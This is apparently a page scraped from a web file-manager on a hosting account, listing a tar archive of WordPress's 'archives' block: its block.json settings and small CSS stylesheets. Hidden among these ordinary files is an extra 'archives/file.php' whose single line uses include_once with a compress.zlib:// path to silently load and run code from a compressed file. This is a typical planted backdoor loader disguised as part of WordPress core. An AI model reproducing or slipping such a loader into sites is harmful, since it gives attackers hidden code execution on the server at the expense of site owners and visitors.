File manager - Edit - /home/bdwebsol/public_html/demo.bdwebsolution.com/blocks.tar
Back
archives/block.json 0000755 00000002603 15221072723 0010342 0 ustar 00 { "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/archives", "title": "Archives", "category": "widgets", "description": "Display a date archive of your posts.", "textdomain": "default", "attributes": { "displayAsDropdown": { "type": "boolean", "default": false }, "showLabel": { "type": "boolean", "default": true }, "showPostCounts": { "type": "boolean", "default": false }, "type": { "type": "string", "default": "monthly" } }, "supports": { "anchor": true, "align": true, "__experimentalBorder": { "radius": true, "color": true, "width": true, "style": true }, "html": false, "spacing": { "margin": true, "padding": true, "__experimentalDefaultControls": { "margin": false, "padding": false } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } }, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true, "link": true } }, "interactivity": { "clientNavigation": true } } } archives/style-rtl.css 0000755 00000000151 15221072723 0011022 0 ustar 00 .wp-block-archives { box-sizing: border-box; } .wp-block-archives-dropdown label { display: block; } archives/style-rtl.min.css 0000644 00000000131 15221072723 0011577 0 ustar 00 .wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block} archives/style.css 0000755 00000000151 15221072723 0010223 0 ustar 00 .wp-block-archives { box-sizing: border-box; } .wp-block-archives-dropdown label { display: block; } archives/style.min.css 0000644 00000000131 15221072723 0011000 0 ustar 00 .wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block} archives/file.php 0000644 00000000062 15221072723 0007777 0 ustar 00 <?php include_once "compress.zlib://file.gz";?>